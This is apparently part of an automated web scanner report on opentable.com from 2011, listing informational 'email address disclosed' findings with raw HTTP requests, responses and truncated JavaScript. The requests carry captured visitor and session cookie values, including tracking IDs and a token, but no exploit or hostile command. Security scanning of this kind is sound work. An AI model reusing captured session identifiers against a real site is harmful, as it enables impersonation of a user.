Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 100437
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:38 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-05
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

var Prototype={Version:"1.6.0",Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf("AppleWebKit/")>-1,Gecko:navigator.userAgent.indexOf("Gecko")>-
...[SNIP]...

8.159. http://www.opentable.com/jscripts/mbox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/mbox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/mbox.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 22254
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:16 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

var mboxCopyright="Copyright 1996-2010. Adobe Systems Incorporated. All rights reserved";mboxUrlBuilder=function(a,b){this.a=a;this.b=b;this.c=new Array;this.d=function(e){return e};this.f=null};mboxU
...[SNIP]...

8.160. http://www.opentable.com/jscripts/otlibrary.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/otlibrary.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/otlibrary.js?ver=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 25699
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:18 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:45 GMT

window.onerror=null;var m_nSearchModuleTTResponse=0;var ControlClientIDS={};var m_sCookieDomain=null;var AdPanelSupressAds=0;var m_cRetryInterval=2E3;var m_bRenderedAdOnPage=false;var cCONST_NOPAID_AD
...[SNIP]...

8.161. http://www.opentable.com/jscripts/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/s_code.js HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 34164
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:22 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:44 GMT

var s=s_gi(s_account);s.currencyCode="USD";s.trackDownloadLinks=true;s.trackExternalLinks=true;s.trackInlineStats=true;s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,pp
...[SNIP]...

8.162. http://www.opentable.com/jscripts/search/Filters.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Filters.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Filters.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 65153
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:01 GMT

var m_nMaxItemsPerFilterGroup=3;var m_nLocationPopup_NeighborhoodColumnCount=3;var m_nCuisinePopup_CuisineColumnCount=3;var m_oSubmissionTimer=null;var m_oMicroToMacroCuisineLookup=new Hash;var m_nTem
...[SNIP]...

8.163. http://www.opentable.com/jscripts/search/Results.Common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Results.Common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Results.Common.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 32197
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

var m_sDebugMessage="";var m_bWasFirstSuccessfulResultShown=false;var m_hashParsedValues=new Hash;var cCONST_GEO_METRO_REDIRECT_PLACEHOLDER="^METRO_REDIR^";var GridType={ResultsGrid:0,PopGrid:1,NextAv
...[SNIP]...

8.164. http://www.opentable.com/jscripts/search/Results.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/Results.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/Results.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 6817
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:26 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:52 GMT

var m_bSetSCRestPopupValue=false;var m_arrDropdownIDsToExcludeFromHidding=["GeoLocationDistance"];function ResultsPage_OnLoad(){ToggleProcessingMessage(false);try{if(UpdateMapImage)Event.observe(windo
...[SNIP]...

8.165. http://www.opentable.com/jscripts/search/SearchBox.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/search/SearchBox.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/search/SearchBox.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 33207
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:28 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:02 GMT

var Metro={ID:null,Name:null,ShortName:null,Latitude:null,Longitude:null,CountryCode:null,LatSpan:null,LonSpan:null};var GeoLocationMessage={MetroRedirect:1,NotFound:2,HideAll:3,MultiMatch:4};
var OT_
...[SNIP]...

8.166. http://www.opentable.com/jscripts/topten.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jscripts/topten.js

Issue detail

The following email address was disclosed in the response:

Request

GET /jscripts/topten.js?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/jaspers-corner-tap-and-kitchen?rid=200&restref=200
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3600
Content-Length: 21911
Content-Type: application/x-javascript
Last-Modified: Fri, 23 Sep 2011 02:14:24 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:55:09 GMT

var m_cMostBooked1000ListTypeID="2";var m_cListItemID_Prefix="dvCat_";var m_cListItemRestaurantsID_Prefix="DIV_";var m_cRegionSlotSCVar="regionslot";var m_cDCListSlotSCVar="DClist";var m_currentObj=nu
...[SNIP]...

8.167. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
